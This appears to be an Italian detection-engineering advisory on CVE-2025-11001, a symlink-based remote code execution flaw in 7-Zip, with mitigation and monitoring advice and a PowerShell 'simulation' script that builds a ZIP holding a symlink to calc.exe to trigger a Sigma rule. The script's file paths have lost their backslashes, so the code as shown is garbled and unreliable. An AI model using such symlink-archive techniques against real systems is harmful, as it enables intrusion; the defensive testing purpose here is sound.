CVE-2025-11001: NHS Avverte del PoC Exploit per Vulnerabilità RCE Basata su Collegamenti Simbolici in 7-Zip

Sommario

I difensori hanno rivelato una vulnerabilità di esecuzione di codice remoto in 7-Zip (CVE-2025-11001), attivata da archivi ZIP appositamente creati contenenti collegamenti simbolici. NHS England Digital ha pubblicato un avviso indicando la disponibilità di un codice exploit proof-of-concept (PoC), sottolineando al contempo che al momento non era stata rilevata alcuna sfruttamento confermato in-the-wild. Il problema colpisce principalmente gli ambienti Windows e può essere sfruttato da avversari che ottengono accesso a un account di servizio. Un aggiornamento dell’avviso successivo ha chiarito che, nonostante le preoccupazioni iniziali, non era stata osservata alcuna sfruttamento attiva.

Analisi di CVE-2025-11001

I ricercatori hanno determinato che CVE-2025-11001 deriva da un difetto di traversata del percorso nella gestione dei collegamenti simbolici nei file ZIP da parte di 7-Zip. La Zero Day Initiative di Trend Micro ha sottolineato il potenziale impatto e un ricercatore di sicurezza ha pubblicato un PoC che mostra l’esecuzione pratica di codice attraverso il bug. NHS England Digital ha monitorato la telemetria alla ricerca di segni di sfruttamento e ha emesso linee guida informate da queste scoperte di ricerca e dai report di threat-intel.

Mitigazione

Per mitigare il rischio, gli utenti dovrebbero aggiornare alla versione 7-Zip 25.00, che risolve sia CVE-2025-11001 che CVE-2025-11002. Le organizzazioni dovrebbero dare priorità a questo aggiornamento sui sistemi in cui 7-Zip viene eseguito con privilegi elevati o strumenti di sviluppo. Altre misure di indurimento includono il blocco dell’esecuzione di archivi non affidabili, la limitazione di chi può eseguire 7-Zip su host sensibili e il monitoraggio per comportamenti di processo insoliti relativi alla gestione degli archivi.

Risposta

I team di rilevamento e risposta dovrebbero tenere d’occhio i processi di 7-Zip avviati da percorsi non affidabili e per la creazione anomala di collegamenti simbolici in directory temporanee o scrivibili dall’utente. Genera avvisi quando i processi ad alto privilegio originano da attività di 7-Zip e corralano questi segnali con i Windows Event Logs per individuare potenziali tentativi di esecuzione di codice. Assicurarsi che l’ultima patch di 7-Zip sia distribuita e rafforzare le politiche di esecuzione del minimo privilegio su endopoint.

Esecuzione della Simulazione

Prerequisito: Il controllo preliminare di Telemetry & Baseline Pre-flight deve essere superato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.

• Narrativa e Comandi dell’Attacco:
  L’avversario crea un archivio malevolo chiamato “7‑Zip 21.02_exploit.zip” che contiene un collegamento simbolico che punta a C:WindowsSystem32calc.exe. Quando la vittima estrae l’archivio con una versione vulnerabile di 7‑Zip (21.02), il collegamento simbolico viene risolto, causando la scrittura del payload controllato dall’attaccante in una posizione privilegiata e successivamente eseguito, ottenendo l’esecuzione di codice remoto tramite CVE‑2025‑11001.

  Passaggi effettuati sulla workstation dell’attaccante (simulato localmente):

  1. Creare un collegamento simbolico link_to_calc che punta a C:WindowsSystem32calc.exe.
  2. Raccogli il symlink in un file ZIP il cui nome include la stringa esatta “7‑Zip 21.02”.
  3. Lascia il file ZIP sull’host target (simulato copiando in una cartella monitorata).

• Script di Test di Regressione: Il seguente script PowerShell riproduce le azioni sopra descritte sulla macchina target. Si assume che l’utente corrente abbia i diritti per creare collegamenti simbolici (SeCreateSymbolicLinkPrivilege).

  # Script di simulazione – crea un ZIP malevolo che dovrebbe attivare la regola Sigma
  # Prerequisito: Eseguire come Amministratore per creare un symlink
  
  # 1. Definire i percorsi
  $tempDir   = "$env:Tempziptp"
  $linkPath  = "$tempDirlink_to_calc"
  $targetExe = "$env:WINDIRSystem32calc.exe"
  $zipPath   = "$tempDir7-Zip 21.02_exploit.zip"
  
  # 2. Preparare la directory di lavoro
  New-Item -ItemType Directory -Force -Path $tempDir | Out-Null
  
  # 3. Creare un collegamento simbolico (tipo file)
  cmd /c mklink "$linkPath" "$targetExe" | Out-Null
  
  # 4. Verificare la creazione del link
  if (-not (Test-Path $linkPath -PathType Leaf)) {
      Write-Error "Creazione del collegamento simbolico fallita."
      exit 1
  }
  
  # 5. Aggiungere il symlink a un archivio ZIP usando 7‑Zip (si presume che 7z.exe sia nel PATH)
  & 7z a -tzip -slink "$zipPath" "$linkPath" | Out-Null
  
  # 6. Pulire il link temporaneo (mantenendo lo ZIP per il rilevamento)
  Remove-Item $linkPath -Force
  
  Write-Host "ZIP malevolo creato in $zipPath"

• Comandi di Pulizia: Rimuovere l’artifact dopo la verifica.

  $tempDir = "$env:Tempziptp"
  Remove-Item -Recurse -Force $tempDir
  Write-Host "Pulizia completata."